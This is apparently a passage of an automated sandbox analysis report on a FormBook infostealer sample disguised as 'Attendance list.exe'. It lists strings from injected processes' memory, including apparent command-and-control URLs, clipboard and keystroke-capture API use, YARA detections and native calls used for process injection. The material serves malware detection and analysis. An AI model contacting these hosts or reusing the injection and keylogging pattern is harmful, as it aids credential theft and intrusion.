            Source: clip.exe, 00000004.00000002.4461785541.0000000002780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: clip.exe, 00000004.00000002.4461785541.0000000002780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: clip.exe, 00000004.00000002.4461785541.0000000002780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: clip.exe, 00000004.00000002.4461785541.0000000002780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: clip.exe, 00000004.00000002.4461785541.0000000002780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: clip.exe, 00000004.00000003.2359386473.0000000007930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.000000000729C000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.00000000062FC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&rand=
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.000000000729C000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.00000000062FC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006F78000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005FD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/icons/free-basic-hosting.png
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006F78000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005FD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/piwik.png
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006F78000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005FD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/typo3-2.png
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006F78000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005FD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.domaintechnik.at/fileadmin/pics/logos/icann.gif
            Source: clip.exe, 00000004.00000003.2363580118.000000000795E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: clip.exe, 00000004.00000003.2363580118.000000000795E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.000000000729C000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.00000000062FC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.00000000062E8000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005348000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.hatercoin.online/wf3a/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=EKVDXBgImxJWeZhJNsklc3Q8dq4iVG0MTaJQI
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000005FC4000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005024000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.2467474395.000000001DF14000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.hprlz.cz/w6qg/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=0lpTRQcDUH
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000005FC4000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005024000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.2467474395.000000001DF14000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.hprlz.cz/w6qg/?Jjv=GpKhRVSHzLA8j4R&amp;66s0QHx=0lpTRQcDUH
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.000000000660C000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.000000000566C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.networksolutions.com/
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.000000000729C000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.00000000062FC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.000000000729C000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.00000000062FC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.000000000729C000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.00000000062FC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_lan
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.000000000729C000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.00000000062FC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.000000000729C000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.00000000062FC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.online&utm_medium=parking&
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.000000000729C000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.00000000062FC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.helpers-lion.online&amp;reg_source=parking_auto
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0093425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0093425A
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00934458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00934458
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0093425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0093425A
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00920219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00920219
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0094CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0094CDAC

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4463038232.00000000042F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4461289694.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2180673228.00000000034C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4462982503.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2180342193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4463119733.0000000004980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2181155888.0000000005A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4463038232.00000000042F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4461289694.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2180673228.00000000034C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4462982503.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2180342193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4463119733.0000000004980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2181155888.0000000005A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: This is a third-party compiled AutoIt script.0_2_008C3B4C
            Source: Attendance list.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: Attendance list.exe, 00000000.00000000.1985627853.0000000000975000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_19659501-a
            Source: Attendance list.exe, 00000000.00000000.1985627853.0000000000975000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_ab5baff0-5
            Source: Attendance list.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_40eaf418-0
            Source: Attendance list.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_5a41d322-4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042AFF3 NtClose,2_2_0042AFF3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672B60 NtClose,LdrInitializeThunk,2_2_03672B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03672DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03672C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036735C0 NtCreateMutant,LdrInitializeThunk,2_2_036735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03674340 NtSetContextThread,2_2_03674340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03674650 NtSuspendThread,2_2_03674650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BE0 NtQueryValueKey,2_2_03672BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BF0 NtAllocateVirtualMemory,2_2_03672BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BA0 NtEnumerateValueKey,2_2_03672BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672B80 NtQueryInformationFile,2_2_03672B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AF0 NtWriteFile,2_2_03672AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AD0 NtReadFile,2_2_03672AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AB0 NtWaitForSingleObject,2_2_03672AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F60 NtCreateProcessEx,2_2_03672F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F30 NtCreateSection,2_2_03672F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FE0 NtCreateFile,2_2_03672FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FA0 NtQuerySection,2_2_03672FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FB0 NtResumeThread,2_2_03672FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F90 NtProtectVirtualMemory,2_2_03672F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672E30 NtWriteVirtualMemory,2_2_03672E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672EE0 NtQueueApcThread,2_2_03672EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672EA0 NtAdjustPrivilegesToken,2_2_03672EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672E80 NtReadVirtualMemory,2_2_03672E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D30 NtUnmapViewOfSection,2_2_03672D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D00 NtSetInformationFile,2_2_03672D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D10 NtMapViewOfSection,2_2_03672D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DD0 NtDelayExecution,2_2_03672DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DB0 NtEnumerateKey,2_2_03672DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C60 NtCreateKey,2_2_03672C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C00 NtQueryInformationProcess,2_2_03672C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CF0 NtOpenProcess,2_2_03672CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CC0 NtQueryVirtualMemory,2_2_03672CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CA0 NtQueryInformationToken,2_2_03672CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673010 NtOpenDirectoryObject,2_2_03673010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673090 NtSetValueKey,2_2_03673090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036739B0 NtGetContextThread,2_2_036739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673D70 NtOpenThread,2_2_03673D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673D10 NtOpenProcessToken,2_2_03673D10
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04684650 NtSuspendThread,LdrInitializeThunk,4_2_04684650
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04684340 NtSetContextThread,LdrInitializeThunk,4_2_04684340
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682C60 NtCreateKey,LdrInitializeThunk,4_2_04682C60
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_04682C70
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_04682CA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_04682D30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682D10 NtMapViewOfSection,LdrInitializeThunk,4_2_04682D10
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_04682DF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682DD0 NtDelayExecution,LdrInitializeThunk,4_2_04682DD0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682EE0 NtQueueApcThread,LdrInitializeThunk,4_2_04682EE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_04682E80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682F30 NtCreateSection,LdrInitializeThunk,4_2_04682F30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682FE0 NtCreateFile,LdrInitializeThunk,4_2_04682FE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682FB0 NtResumeThread,LdrInitializeThunk,4_2_04682FB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682AF0 NtWriteFile,LdrInitializeThunk,4_2_04682AF0
